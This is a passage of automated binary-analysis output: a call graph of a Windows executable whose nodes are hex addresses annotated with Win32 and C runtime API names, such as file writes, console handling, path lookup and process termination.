105437->105440 105441 f40a6a 105437->105441 105612 f38af4 58 API calls __getptd_noexit 105440->105612 105444 f3d206 ___lock_fhandle 59 API calls 105441->105444 105442 f40a65 105616 f38b28 58 API calls __getptd_noexit 105442->105616 105446 f40a70 105444->105446 105448 f40a83 105446->105448 105449 f40a8e 105446->105449 105447 f40ac9 105617 f38db6 9 API calls __wfsopen 105447->105617 105595 f40add 105448->105595 105613 f38b28 58 API calls __getptd_noexit 105449->105613 105453 f40a27 __fcloseall 105453->105408 105454 f40a89 105614 f40ab5 LeaveCriticalSection __unlock_fhandle 105454->105614 105456->105400 105457->105398 105459 f3d892 __fcloseall 105458->105459 105460 f3d8b6 105459->105460 105461 f3d89f 105459->105461 105462 f3d955 105460->105462 105465 f3d8ca 105460->105465 105559 f38af4 58 API calls __getptd_noexit 105461->105559 105565 f38af4 58 API calls __getptd_noexit 105462->105565 105464 f3d8a4 105560 f38b28 58 API calls __getptd_noexit 105464->105560 105468 f3d8f2 105465->105468 105469 f3d8e8 105465->105469 105486 f3d206 105468->105486 105561 f38af4 58 API calls __getptd_noexit 105469->105561 105470 f3d8ed 105566 f38b28 58 API calls __getptd_noexit 105470->105566 105471 f3d8ab __fcloseall 105471->105415 105474 f3d8f8 105476 f3d90b 105474->105476 105477 f3d91e 105474->105477 105495 f3d975 105476->105495 105562 f38b28 58 API calls __getptd_noexit 105477->105562 105478 f3d961 105567 f38db6 9 API calls __wfsopen 105478->105567 105482 f3d923 105563 f38af4 58 API calls __getptd_noexit 105482->105563 105483 f3d917 105564 f3d94d LeaveCriticalSection __unlock_fhandle 105483->105564 105487 f3d212 __fcloseall 105486->105487 105488 f3d261 EnterCriticalSection 105487->105488 105490 f39c0b __lock 58 API calls 105487->105490 105489 f3d287 __fcloseall 105488->105489 105489->105474 105491 f3d237 105490->105491 105492 f3d24f 105491->105492 105568 f39e2b InitializeCriticalSectionAndSpinCount 105491->105568 105569 f3d28b LeaveCriticalSection _doexit 105492->105569 105496 f3d982 __ftell_nolock 105495->105496 105497 f3d9c1 105496->105497 105498 f3d9e0 105496->105498 105527 f3d9b6 105496->105527 105579 f38af4 58 API calls __getptd_noexit 105497->105579 105501 f3da38 105498->105501 105502 f3da1c 105498->105502 105499 f3c5f6 __NMSG_WRITE 6 API calls 105503 f3e1d6 105499->105503 105506 f3da51 105501->105506 105585 f418c1 60 API calls 3 library calls 105501->105585 105582 f38af4 58 API calls __getptd_noexit 105502->105582 105503->105483 105504 f3d9c6 105580 f38b28 58 API calls __getptd_noexit 105504->105580 105570 f45c6b 105506->105570 105508 f3da21 105583 f38b28 58 API calls __getptd_noexit 105508->105583 105510 f3d9cd 105581 f38db6 9 API calls __wfsopen 105510->105581 105514 f3da5f 105515 f3ddb8 105514->105515 105586 f399ac 58 API calls 2 library calls 105514->105586 105517 f3ddd6 105515->105517 105518 f3e14b WriteFile 105515->105518 105516 f3da28 105584 f38db6 9 API calls __wfsopen 105516->105584 105521 f3defa 105517->105521 105529 f3ddec 105517->105529 105522 f3ddab GetLastError 105518->105522 105526 f3dd78 105518->105526 105533 f3dfef 105521->105533 105535 f3df05 105521->105535 105522->105526 105523 f3da8b GetConsoleMode 105523->105515 105525 f3daca 105523->105525 105524 f3e184 105524->105527 105591 f38b28 58 API calls __getptd_noexit 105524->105591 105525->105515 105528 f3dada GetConsoleCP 105525->105528 105526->105524 105526->105527 105532 f3ded8 105526->105532 105527->105499 105528->105524 105556 f3db09 105528->105556 105529->105524 105530 f3de5b WriteFile 105529->105530 105530->105522 105534 f3de98 105530->105534 105537 f3dee3 105532->105537 105538 f3e17b 105532->105538 105533->105524 105539 f3e064 WideCharToMultiByte 105533->105539 105534->105529 105540 f3debc 105534->105540 105535->105524 105541 f3df6a WriteFile 105535->105541 105536 f3e1b2 105592 f38af4 58 API calls __getptd_noexit 105536->105592 105588 f38b28 58 API calls __getptd_noexit 105537->105588 105590 f38b07 58 API calls 3 library calls 105538->105590 105539->105522 105551 f3e0ab 105539->105551 105540->105526 105541->105522 105543 f3dfb9 105541->105543 105543->105526 105543->105535 105543->105540 105546 f3dee8 105589 f38af4 58 API calls __getptd_noexit 105546->105589 105547 f3e0b3 WriteFile 105550 f3e106 GetLastError 105547->105550 105547->105551 105550->105551 105551->105526 105551->105533 105551->105540 105551->105547 105552 f47a5e WriteConsoleW CreateFileW __putwch_nolock 105557 f3dc5f 105552->105557 105553 f462ba 60 API calls __write_nolock 105553->105556 105554 f3dbf2 WideCharToMultiByte 105554->105526 105555 f3dc2d WriteFile 105554->105555 105555->105522 105555->105557 105556->105526 105556->105553 105556->105554 105556->105557 105587 f335f5 58 API calls __isleadbyte_l 105556->105587 105557->105522 105557->105526 105557->105552 105557->105556 105558 f3dc87 WriteFile 105557->105558 105558->105522 105558->105557 105559->105464 105560->105471 105561->105470 105562->105482 105563->105483 105564->105471 105565->105470 105566->105478 105567->105471 105568->105492 105569->105488 105571 f45c76 105570->105571 105572 f45c83 105570->105572 105573 f38b28 __wfsopen 58 API calls 105571->105573 105574 f45c8f 105572->105574 105575 f38b28 __wfsopen 58 API calls 105572->105575 105576 f45c7b 105573->105576 105574->105514 105577 f45cb0 105575->105577 105576->105514 105578 f38db6 __wfsopen 9 API calls 105577->105578 105578->105576 105579->105504 105580->105510 105581->105527 105582->105508 105583->105516 105584->105527 105585->105506 105586->105523 105587->105556 105588->105546 105589->105527 105590->105527 105591->105536 105592->105527 105593->105427 105594->105429 105618 f3d4c3 105595->105618 105597 f40b41 105631 f3d43d 59 API calls 2 library calls 105597->105631 105599 f40aeb 105599->105597 105600 f3d4c3 __lseeki64_nolock 58 API calls 105599->105600 105609 f40b1f 105599->105609 105604 f40b16 105600->105604 105601 f3d4c3 __lseeki64_nolock 58 API calls 105605 f40b2b CloseHandle 105601->105605 105602 f40b49 105603 f40b6b 105602->105603 105632 f38b07 58 API calls 3 library calls 105602->105632 105603->105454 105607 f3d4c3 __lseeki64_nolock 58 API calls 105604->105607 105605->105597 105608 f40b37 GetLastError 105605->105608 105607->105609 105608->105597 105609->105597 105609->105601 105610->105436 105611->105453 105612->105442 105613->105454 105614->105453 105615->105442 105616->105447 105617->105453 105619 f3d4e3 105618->105619 105620 f3d4ce 105618->105620 105625 f3d508 105619->105625 105635 f38af4 58 API calls __getptd_noexit 105619->105635 105633 f38af4 58 API calls __getptd_noexit 105620->105633 105622 f3d4d3 105634 f38b28 58 API calls __getptd_noexit 105622->105634 105625->105599 105626 f3d512 105636 f38b28 58 API calls __getptd_noexit 105626->105636 105627 f3d4db 105627->105599 105629 f3d51a 105637 f38db6 9 API calls __wfsopen 105629->105637 105631->105602 105632->105603 105633->105622 105634->105627 105635->105626 105636->105629 105637->105627 105700 f41940 105638->105700 105641 f14799 105706 f17d8c 105641->105706 105642 f1477c 105643 f17bcc 59 API calls 105642->105643 105645 f14788 105643->105645 105702 f17726 105645->105702 105648 f30791 105649 f41940 __ftell_nolock 105648->105649 105650 f3079e GetLongPathNameW 105649->105650 105651 f17bcc 59 API calls 105650->105651 105652 f172bd 105651->105652 105653 f1700b 105652->105653 105654 f17667 59 API calls 105653->105654 105655 f1701d 105654->105655 105656 f14750 60 API calls 105655->105656 105657 f17028 105656->105657 105658 f17033 105657->105658 105661 f4e885 105657->105661 105660 f13f74 59 API calls 105658->105660 105662 f1703f 105660->105662 105663 f4e89f 105661->105663 105716 f17908 61 API calls 105661->105716 105710 f134c2 105662->105710 105665 f17052 Mailbox 105665->104811 105667 f14ddd 136 API calls 105666->105667 105668 f1688f 105667->105668 105669 f4e031 105668->105669 105670 f14ddd 136 API calls 105668->105670 105671 f7955b 122 API calls 105669->105671 105672 f168a3 105670->105672 105673 f4e046 105671->105673 105672->105669 105674 f168ab 105672->105674 105675 f4e067 105673->105675 105676 f4e04a 105673->105676 105679 f4e052 105674->105679 105680 f168b7 105674->105680 105678 f30db6 Mailbox 59 API calls 105675->105678 105677 f14e4a 84 API calls 105676->105677 105677->105679 105685 f4e0ac Mailbox 105678->105685 105824 f742f8 90 API calls _wprintf 105679->105824 105717 f16a8c 105680->105717 105683 f4e060 105683->105675 105686 f4e260 105685->105686 105694 f4e271 105685->105694 105697 f17de1 59 API calls 105685->105697 105810 f1750f 105685->105810 105818 f1735d 105685->105818 105825 f6f73d 59 API calls 2 library calls 105685->105825 105826 f6f65e 61 API calls 2 library calls 105685->105826 105827 f7737f 59 API calls Mailbox 105685->105827 105687 f32d55 _free 58 API calls 105686->105687 105688 f4e268 105687->105688 105689 f14e4a 84 API calls 105688->105689 105689->105694 105693 f32d55 _free 58 API calls 105693->105694 105694->105693 105696 f14e4a 84 API calls 105694->105696 105828 f6f7a1 89 API calls 4 library calls 105694->105828 105696->105694 105697->105685 105701 f1475d GetFullPathNameW 105700->105701 105701->105641 105701->105642 105703 f17734 105702->105703 105704 f17d2c 59 API calls 105703->105704 105705 f14794 105704->105705 105705->105648 105707 f17da6 105706->105707 105709 f17d99 105706->105709 105708 f30db6 Mailbox 59 API calls 105707->105708 105708->105709 105709->105645 105711 f134d4 105710->105711 105715 f134f3 _memmove 105710->105715 105714 f30db6 Mailbox 59 API calls 105711->105714 105712 f30db6 Mailbox 59 API calls 105713 f1350a 105712->105713 105713->105665 105714->105715 105715->105712 105716->105661 105718 f16ab5 105717->105718 105719 f4e41e 105717->105719 105834 f157a6 60 API calls Mailbox 105718->105834 105901 f6f7a1 89 API calls 4 library calls 105719->105901 105722 f4e431 105902 f6f7a1 89 API calls 4 library calls 105722->105902 105723 f16ad7 105835 f157f6 67 API calls 105723->105835 105725 f16aec 105725->105722 105727 f16af4 105725->105727 105728 f17667 59 API calls 105727->105728 105730 f16b00 105728->105730 105729 f4e44d 105761 f16b61 105729->105761 105836 f30957 60 API calls __ftell_nolock 105730->105836 105732 f16b0c 105735 f17667 59 API calls 105732->105735 105733 f4e460 105736 f15c6f CloseHandle 105733->105736 105734 f16b6f 105737 f17667 59 API calls 105734->105737 105738 f16b18 105735->105738 105739 f4e46c 105736->105739 105740 f16b78 105737->105740 105741 f14750 60 API calls 105738->105741 105742 f14ddd 136 API calls 105739->105742 105743 f17667 59 API calls 105740->105743 105745 f16b26 105741->105745 105746 f4e488 105742->105746 105744 f16b81 105743->105744 105839 f1459b 105744->105839 105837 f15850 ReadFile SetFilePointerEx 105745->105837 105749 f4e4b1 105746->105749 105753 f7955b 122 API calls 105746->105753 105903 f6f7a1 89 API calls 4 library calls 105749->105903 105750 f16b98 105755 f17b2e 59 API calls 105750->105755 105752 f16b52 105838 f15aee SetFilePointerEx SetFilePointerEx 105752->105838 105754 f4e4a4 105753->105754 105758 f4e4ac 105754->105758 105759 f4e4cd 105754->105759 105760 f16ba9 SetCurrentDirectoryW 105755->105760 105756 f4e4c8 105788 f16d0c Mailbox 105756->105788 105762 f14e4a 84 API calls 105758->105762 105763 f14e4a 84 API calls 105759->105763 105766 f16bbc Mailbox 105760->105766 105761->105733 105761->105734 105762->105749 105764 f4e4d2 105763->105764 105765 f30db6 Mailbox 59 API calls 105764->105765 105772 f4e506 105765->105772 105768 f30db6 Mailbox 59 API calls 105766->105768 105770 f16bcf 105768->105770 105769 f13bbb 105769->104670 105769->104679 105771 f1522e 59 API calls 105770->105771 105799 f16bda Mailbox __NMSG_WRITE 105771->105799 105773 f1750f 59 API calls 105772->105773 105807 f4e54f Mailbox 105773->105807 105774 f16ce7 105897 f15c6f 105774->105897 105775 f4e740 105908 f772df 59 API calls Mailbox 105775->105908 105778 f16cf3 SetCurrentDirectoryW 105778->105788 105781 f4e762 105909 f8fbce 59 API calls 2 library calls 105781->105909 105784 f4e76f 105786 f32d55 _free 58 API calls 105784->105786 105785 f4e7d9 105912 f6f7a1 89 API calls 4 library calls 105785->105912 105786->105788 105829 f157d4 105788->105829 105790 f1750f 59 API calls 105790->105807 105791 f4e7f2 105791->105774 105793 f4e7d1 105911 f6f5f7 59 API calls 4 library calls 105793->105911 105794 f17de1 59 API calls 105794->105799 105799->105774 105799->105785 105799->105793 105799->105794 105890 f1586d 67 API calls _wcscpy 105799->105890 105891 f16f5d GetStringTypeW 105799->105891 105892 f16ecc 60 API calls __wcsnicmp 105799->105892 105893 f16faa GetStringTypeW __NMSG_WRITE 105799->105893 105894 f3363d GetStringTypeW _iswctype 105799->105894 105895 f168dc 165 API calls 3 library calls 105799->105895 105896 f17213 59 API calls Mailbox 105799->105896 105800 f17de1 59 API calls 105800->105807 105804 f4e792 105910 f6f7a1 89 API calls 4 library calls 105804->105910 105806 f4e7ab 105808 f32d55 _free 58 API calls 105806->105808 105807->105775 105807->105790 105807->105800 105807->105804 105904 f6f73d 59 API calls 2 library calls 105807->105904 105905 f6f65e 61 API calls 2 library calls 105807->105905 105906 f7737f 59 API calls Mailbox 105807->105906 105907 f17213 59 API calls Mailbox 105807->105907 105809 f4e7be 105808->105809 105809->105788 105811 f175af 105810->105811 105815 f17522 _memmove 105810->105815 105813 f30db6 Mailbox 59 API calls 105811->105813 105812 f30db6 Mailbox 59 API calls 105814 f17529 105812->105814 105813->105815 105816 f30db6 Mailbox 59 API calls 105814->105816 105817 f17552 105814->105817 105815->105812 105816->105817 105817->105685 105819 f17370 105818->105819 105821 f1741e 105818->105821 105820 f30db6 Mailbox 59 API calls 105819->105820 105823 f173a2 105819->105823 105820->105823 105821->105685 105822 f30db6 59 API calls Mailbox 105822->105823 105823->105821 105823->105822 105824->105683 105825->105685 105826->105685 105827->105685 105828->105694 105830 f15c6f CloseHandle 105829->105830 105831 f157dc Mailbox 105830->105831 105832 f15c6f CloseHandle 105831->105832 105833 f157eb 105832->105833 105833->105769 105834->105723 105835->105725 105836->105732 105837->105752 105838->105761 105840 f17667 59 API calls 105839->105840 105841 f145b1 105840->105841 105842 f17667 59 API calls 105841->105842 105843 f145b9 105842->105843 105844 f17667 59 API calls 105843->105844 105845 f145c1 105844->105845 105846 f17667 59 API calls 105845->105846 105847 f145c9 105846->105847 105848 f4d4d2 105847->105848 105849 f145fd 105847->105849 105850 f18047 59 API calls 105848->105850 105851 f1784b 59 API calls 105849->105851 105852 f4d4db 105850->105852 105853 f1460b 105851->105853 105854 f17d8c 59 API calls 105852->105854 105855 f17d2c 59 API calls 105853->105855 105858 f14640 105854->105858 105856 f14615 105855->105856 105856->105858 105859 f1784b 59 API calls 105856->105859 105857 f14680 105913 f1784b 105857->105913 105858->105857 105861 f1465f 105858->105861 105877 f4d4fb 105858->105877 105862 f14636 105859->105862 105863 f179f2 59 API calls 105861->105863 105866 f17d2c 59 API calls 105862->105866 105868 f14669 105863->105868 105864 f14691 105869 f146a3 105864->105869 105870 f18047 59 API calls 105864->105870 105865 f4d5cb 105867 f17bcc 59 API calls 105865->105867 105866->105858 105885 f4d588 105867->105885 105868->105857 105874 f1784b 59 API calls 105868->105874 105871 f146b3 105869->105871 105872 f18047 59 API calls 105869->105872 105870->105869 105873 f146ba 105871->105873 105875 f18047 59 API calls 105871->105875 105872->105871 105876 f18047 59 API calls 105873->105876 105887 f146c1 Mailbox 105873->105887 105874->105857 105875->105873 105876->105887 105877->105865 105878 f4d5b4 105877->105878 105884 f4d532 105877->105884 105878->105865 105881 f4d59f 105878->105881 105879 f179f2 59 API calls 105879->105885 105880 f4d590 105882 f17bcc 59 API calls 105880->105882 105883 f17bcc 59 API calls 105881->105883 105882->105885 105883->105885 105884->105880 105888 f4d57b 105884->105888 105885->105857 105885->105879 105926 f17924 59 API calls 2 library calls 105885->105926 105887->105750 105889 f17bcc 59 API calls 105888->105889 105889->105885 105890->105799 105891->105799 105892->105799 105893->105799 105894->105799 105895->105799 105896->105799 105898 f15c79 105897->105898 105899 f15c88 105897->105899 105898->105778 105899->105898 105900 f15c8d CloseHandle 105899->105900 105900->105898 105901->105722 105902->105729 105903->105756 105904->105807 105905->105807 105906->105807 105907->105807 105908->105781 105909->105784 105910->105806 105911->105785 105912->105791 105914 f178b7 105913->105914 105915 f1785a 105913->105915 105917 f17d2c 59 API calls 105914->105917 105915->105914 105916 f17865 105915->105916 105919 f17880 105916->105919 105920 f4eb09 105916->105920 105918 f17888 _memmove 105917->105918 105918->105864 105927 f17f27 59 API calls Mailbox 105919->105927 105921 f18029 59 API calls 105920->105921 105923 f4eb13 105921->105923 105924 f30db6 Mailbox 59 API calls 105923->105924 105925 f4eb33 105924->105925 105926->105885 105927->105918 105929 f16d95 105928->105929 105934 f16ea9 105928->105934 105930 f30db6 Mailbox 59 API calls 105929->105930 105929->105934 105932 f16dbc 105930->105932 105931 f30db6 Mailbox 59 API calls 105933 f16e31 105931->105933 105932->105931 105933->105934 105937 f1735d 59 API calls 105933->105937 105938 f1750f 59 API calls 105933->105938 105941 f16240 105933->105941 105966 f66553 59 API calls Mailbox 105933->105966 105934->104817 105937->105933 105938->105933 105939->104820 105940->104822 105942 f17a16 59 API calls 105941->105942 105955 f16265 105942->105955 105943 f1646a 105944 f1750f 59 API calls 105943->105944 105945 f16484 Mailbox 105944->105945 105945->105933 105948 f17d8c 59 API calls 105948->105955 105949 f16799 _memmove 105972 f6f8aa 91 API calls 4 library calls 105949->105972 105950 f1750f 59 API calls 105950->105955 105951 f4dff6 105971 f6f8aa 91 API calls 4 library calls 105951->105971 105955->105943 105955->105948 105955->105949 105955->105950 105955->105951 105959 f4df92 105955->105959 105963 f17e4f 59 API calls 105955->105963 105967 f15f6c 60 API calls 105955->105967 105968 f15d41 59 API calls Mailbox 105955->105968 105969 f15e72 60 API calls 105955->105969 105970 f17924 59 API calls 2 library calls 105955->105970 105956 f4e004 105957 f1750f 59 API calls 105956->105957 105958 f4e01a 105957->105958 105958->105945 105960 f18029 59 API calls 105959->105960 105962 f4df9d 105960->105962 105965 f30db6 Mailbox 59 API calls 105962->105965 105964 f1643b CharUpperBuffW 105963->105964 105964->105955 105965->105949 105966->105933 105967->105955 105968->105955 105969->105955 105970->105955 105971->105956 105972->105945 105973->104836 105974->104835 105976 f1e6d5 105975->105976 105977 f53aa9 105976->105977 105980 f1e73f 105976->105980 105986 f1e799 105976->105986 106067 f19ea0 105977->106067 105979 f53abe 106005 f1e970 Mailbox 105979->106005 106091 f79e4a 89 API calls 4 library calls 105979->106091 105982 f17667 59 API calls 105980->105982 105980->105986 105981 f17667 59 API calls 105981->105986 105984 f53b04 105982->105984 105987 f32d40 __cinit 67 API calls 105984->105987 105985 f32d40 __cinit 67 API calls 105985->105986 105986->105981 105986->105985 105988 f53b26 105986->105988 105990 f1e95a 105986->105990 105986->106005 105987->105986 105988->104914 105989 f184c0 69 API calls 105989->106005 105990->106005 106092 f79e4a 89 API calls 4 library calls 105990->106092 105991 f19ea0 341 API calls 105991->106005 105995 f79e4a 89 API calls 105995->106005 105998 f18d40 59 API calls 105998->106005 106001 f1f195 106096 f79e4a 89 API calls 4 library calls 106001->106096 106003 f53e25 106003->104914 106004 f1ea78 106004->104914 106005->105989 106005->105991 106005->105995 106005->105998 106005->106001 106005->106004 106066 f17f77 59 API calls 2 library calls 106005->106066 106093 f66e8f 59 API calls 106005->106093 106094 f8c5c3 341 API calls 106005->106094 106095 f8b53c 341 API calls Mailbox 106005->106095 106097 f19c90 59 API calls Mailbox 106005->106097 106098 f893c6 341 API calls Mailbox 106005->106098 106007 f1f650 106006->106007 106008 f1f4ba 106006->106008 106011 f17de1 59 API calls 106007->106011 106009 f1f4c6 106008->106009 106010 f5441e 106008->106010 106200 f1f290 341 API calls 2 library calls 106009->106200 106202 f8bc6b 341 API calls Mailbox 106010->106202 106017 f1f58c Mailbox 106011->106017 106014 f5442c 106018 f1f630 106014->106018 106203 f79e4a 89 API calls 4 library calls 106014->106203 106016 f1f4fd 106016->106014 106016->106017 106016->106018 106023 f14e4a 84 API calls 106017->106023 106105 f73c37 106017->106105 106108 f8445a 106017->106108 106117 f8df37 106017->106117 106120 f7cb7a 106017->106120 106018->104914 106020 f1f5e3 106020->106018 106201 f19c90 59 API calls Mailbox 106020->106201 106023->106020 106026->104914 106027->104914 106028->104914 106029->104844 106030->104850 106031->104914 106032->104849 106033->104849 106034->104849 106035->104914 106036->104914 106037->104914 106039 f19851 106038->106039 106040 f1984b 106038->106040 106041 f4f5d3 __i64tow 106039->106041 106042 f19899 106039->106042 106044 f19857 __itow 106039->106044 106047 f4f4da 106039->106047 106040->104914 106451 f33698 83 API calls 3 library calls 106042->106451 106046 f30db6 Mailbox 59 API calls 106044->106046 106048 f19871 106046->106048 106049 f4f552 Mailbox _wcscpy 106047->106049 106050 f30db6 Mailbox 59 API calls 106047->106050 106048->106040 106051 f17de1 59 API calls 106048->106051 106452 f33698 83 API calls 3 library calls 106049->106452 106052 f4f51f 106050->106052 106051->106040 106053 f30db6 Mailbox 59 API calls 106052->106053 106054 f4f545 106053->106054 106054->106049 106055 f17de1 59 API calls 106054->106055 106055->106049 106056->104914 106057->104914 106058->104914 106059->104900 106060->104900 106061->104900 106062->104900 106063->104900 106064->104900 106065->104900 106066->106005 106068 f19ebf 106067->106068 106086 f19eed Mailbox 106067->106086 106069 f30db6 Mailbox 59 API calls 106068->106069 106069->106086 106070 f1b475 106071 f18047 59 API calls 106070->106071 106084 f1a057 106071->106084 106072 f1b47a 106074 f50055 106072->106074 106090 f509e5 106072->106090 106073 f30db6 59 API calls Mailbox 106073->106086 106101 f79e4a 89 API calls 4 library calls 106074->106101 106075 f17667 59 API calls 106075->106086 106079 f50064 106079->105979 106080 f32d40 67 API calls __cinit 106080->106086 106083 f18047 59 API calls 106083->106086 106084->105979 106085 f66e8f 59 API calls 106085->106086 106086->106070 106086->106072 106086->106073 106086->106074 106086->106075 106086->106080 106086->106083 106086->106084 106086->106085 106087 f509d6 106086->106087 106089 f1a55a 106086->106089 106099 f1c8c0 341 API calls 2 library calls 106086->106099 106100 f1b900 60 API calls Mailbox 106086->106100 106103 f79e4a 89 API calls 4 library calls 106087->106103 106102 f79e4a 89 API calls 4 library calls 106089->106102 106104 f79e4a 89 API calls 4 library calls 106090->106104 106091->106005 106092->106005 106093->106005 106094->106005 106095->106005 106096->106003 106097->106005 106098->106005 106099->106086 106100->106086 106101->106079 106102->106084 106103->106090 106104->106084 106204 f7445a GetFileAttributesW 106105->106204 106109 f19837 84 API calls 106108->106109 106110 f84494 106109->106110 106111 f16240 94 API calls 106110->106111 106112 f844a4 106111->106112 106113 f844c9 106112->106113 106114 f19ea0 341 API calls 106112->106114 106116 f844cd 106113->106116 106208 f19a98 59 API calls Mailbox 106113->106208 106114->106113 106116->106020 106209 f8cadd 106117->106209 106119 f8df47 106119->106020 106121 f17667 59 API calls 106120->106121 106122 f7cbaf 106121->106122 106123 f17667 59 API calls 106122->106123 106124 f7cbb8 106123->106124 106125 f7cbcc 106124->106125 106408 f19b3c 59 API calls 106124->106408 106127 f19837 84 API calls 106125->106127 106128 f7cbe9 106127->106128 106129 f7cc0b 106128->106129 106130 f7ccea 106128->106130 106135 f7cd1a Mailbox 106128->106135 106131 f19837 84 API calls 106129->106131 106132 f14ddd 136 API calls 106130->106132 106133 f7cc17 106131->106133 106134 f7ccfe 106132->106134 106136 f18047 59 API calls 106133->106136 106137 f7cd16 106134->106137 106140 f14ddd 136 API calls 106134->106140 106135->106020 106139 f7cc23 106136->106139 106137->106135 106138 f17667 59 API calls 106137->106138 106141 f7cd4b 106138->106141 106143 f7cc37 106139->106143 106144 f7cc69 106139->106144 106140->106137 106142 f17667 59 API calls 106141->106142 106145 f7cd54 106142->106145 106146 f18047 59 API calls 106143->106146 106147 f19837 84 API calls 106144->106147 106148 f17667 59 API calls 106145->106148 106149 f7cc47 106146->106149 106150 f7cc76 106147->106150 106151 f7cd5d 106148->106151 106152 f17cab 59 API calls 106149->106152 106153 f18047 59 API calls 106150->106153 106154 f17667 59 API calls 106151->106154 106155 f7cc51 106152->106155 106156 f7cc82 106153->106156 106157 f7cd66 106154->106157 106158 f19837 84 API calls 106155->106158 106409 f74a31 GetFileAttributesW 106156->106409 106160 f19837 84 API calls 106157->106160 106162 f7cc5d 106158->106162 106161 f7cd73 106160->106161 106164 f1459b 59 API calls 106161->106164 106165 f17b2e 59 API calls 106162->106165 106163 f7cc8b 106166 f7cc9e 106163->106166 106167 f179f2 59 API calls 106163->106167 106168 f7cd8e 106164->106168 106165->106144 106169 f19837 84 API calls 106166->106169 106175 f7cca4 106166->106175 106167->106166 106170 f179f2 59 API calls 106168->106170 106171 f7cccb 106169->106171 106172 f7cd9d 106170->106172 106410 f737ef 75 API calls Mailbox 106171->106410 106174 f7cdd1 106172->106174 106176 f179f2 59 API calls 106172->106176 106177 f18047 59 API calls 106174->106177 106175->106135 106178 f7cdae 106176->106178 106179 f7cddf 106177->106179 106178->106174 106182 f17bcc 59 API calls 106178->106182 106180 f17b2e 59 API calls 106179->106180 106181 f7cded 106180->106181 106183 f17b2e 59 API calls 106181->106183 106184 f7cdc3 106182->106184 106185 f7cdfb 106183->106185 106186 f17bcc 59 API calls 106184->106186 106187 f17b2e 59 API calls 106185->106187 106186->106174 106188 f7ce09 106187->106188 106189 f19837 84 API calls 106188->106189 106190 f7ce15 106189->106190 106299 f74071 106190->106299 106192 f7ce26 106193 f73c37 3 API calls 106192->106193 106194 f7ce30 106193->106194 106195 f19837 84 API calls 106194->106195 106198 f7ce61 106194->106198 106196 f7ce4e 106195->106196 106353 f79155 106196->106353 106199 f14e4a 84 API calls 106198->106199 106199->106135 106200->106016 106201->106020 106202->106014 106203->106018 106205 f73c3e 106204->106205 106206 f74475 FindFirstFileW 106204->106206 106205->106020 106206->106205 106207 f7448a FindClose 106206->106207 106207->106205 106208->106116 106210 f19837 84 API calls 106209->106210 106211 f8cb1a 106210->106211 106235 f8cb61 Mailbox 106211->106235 106247 f8d7a5 106211->106247 106213 f8cdb9 106214 f8cf2e 106213->106214 106218 f8cdc7 106213->106218 106286 f8d8c8 92 API calls Mailbox 106214->106286 106217 f8cf3d 106217->106218 106219 f8cf49 106217->106219 106260 f8c96e 106218->106260 106219->106235 106220 f19837 84 API calls 106237 f8cbb2 Mailbox 106220->106237 106225 f8ce00 106275 f30c08 106225->106275 106228 f8ce1a 106281 f79e4a 89 API calls 4 library calls 106228->106281 106229 f8ce33 106231 f192ce 59 API calls 106229->106231 106233 f8ce3f 106231->106233 106232 f8ce25 GetCurrentProcess TerminateProcess 106232->106229 106234 f19050 59 API calls 106233->106234 106236 f8ce55 106234->106236 106235->106119 106244 f8ce7c 106236->106244 106282 f18d40 59 API calls Mailbox 106236->106282 106237->106213 106237->106220 106237->106235 106279 f8fbce 59 API calls 2 library calls 106237->106279 106280 f8cfdf 61 API calls 2 library calls 106237->106280 106239 f8cfa4 106239->106235 106241 f8cfb8 FreeLibrary 106239->106241 106240 f8ce6b 106283 f8d649 107 API calls _free 106240->106283 106241->106235 106244->106239 106284 f18d40 59 API calls Mailbox 106244->106284 106285 f19d3c 60 API calls Mailbox 106244->106285 106287 f8d649 107 API calls _free 106244->106287 106248 f17e4f 59 API calls 106247->106248 106249 f8d7c0 CharLowerBuffW 106248->106249 106288 f6f167 106249->106288 106253 f17667 59 API calls 106254 f8d7f9 106253->106254 106255 f1784b 59 API calls 106254->106255 106256 f8d810 106255->106256 106257 f17d2c 59 API calls 106256->106257 106258 f8d81c Mailbox 106257->106258 106259 f8d858 Mailbox 106258->106259 106295 f8cfdf 61 API calls 2 library calls 106258->106295 106259->106237 106261 f8c989 106260->106261 106262 f8c9de 106260->106262 106263 f30db6 Mailbox 59 API calls 106261->106263 106266 f8da50 106262->106266 106265 f8c9ab 106263->106265 106264 f30db6 Mailbox 59 API calls 106264->106265 106265->106262 106265->106264 106267 f8dc79 Mailbox 106266->106267 106274 f8da73 _strcat _wcscpy __NMSG_WRITE 106266->106274 106267->106225 106268 f19b3c 59 API calls 106268->106274 106269 f19b98 59 API calls 106269->106274 106270 f19be6 59 API calls 106270->106274 106271 f3571c 58 API calls std::exception::_Copy_str 106271->106274 106272 f19837 84 API calls 106272->106274 106274->106267 106274->106268 106274->106269 106274->106270 106274->106271 106274->106272 106298 f75887 61 API calls 2 library calls 106274->106298 106277 f30c1d 106275->106277 106276 f30cb5 VirtualProtect 106278 f30c83 106276->106278 106277->106276 106277->106278 106278->106228 106278->106229 106279->106237 106280->106237 106281->106232 106282->106240 106283->106244 106284->106244 106285->106244 106286->106217 106287->106244 106289 f6f192 __NMSG_WRITE 106288->106289 106290 f6f1d1 106289->106290 106293 f6f1c7 106289->106293 106294 f6f278 106289->106294 106290->106253 106290->106258 106293->106290 106296 f178c4 61 API calls 106293->106296 106294->106290 106297 f178c4 61 API calls 106294->106297 106295->106259 106296->106293 106297->106294 106298->106274 106300 f7408d 106299->106300 106301 f74092 106300->106301 106302 f740a0 106300->106302 106304 f18047 59 API calls 106301->106304 106303 f17667 59 API calls 106302->106303 106305 f740a8 106303->106305 106306 f7409b Mailbox 106304->106306 106307 f17667 59 API calls 106305->106307 106306->106192 106308 f740b0 106307->106308 106309 f17667 59 API calls 106308->106309 106310 f740bb 106309->106310 106311 f17667 59 API calls 106310->106311 106312 f740c3 106311->106312 106313 f17667 59 API calls 106312->106313 106314 f740cb 106313->106314 106315 f17667 59 API calls 106314->106315 106316 f740d3 106315->106316 106317 f17667 59 API calls 106316->106317 106318 f740db 106317->106318 106319 f17667 59 API calls 106318->106319 106320 f740e3 106319->106320 106321 f1459b 59 API calls 106320->106321 106322 f740fa 106321->106322 106323 f1459b 59 API calls 106322->106323 106324 f74113 106323->106324 106325 f179f2 59 API calls 106324->106325 106326 f7411f 106325->106326 106327 f74132 106326->106327 106328 f17d2c 59 API calls 106326->106328 106329 f179f2 59 API calls 106327->106329 106328->106327 106330 f7413b 106329->106330 106331 f7414b 106330->106331 106332 f17d2c 59 API calls 106330->106332 106333 f18047 59 API calls 106331->106333 106332->106331 106334 f74157 106333->106334 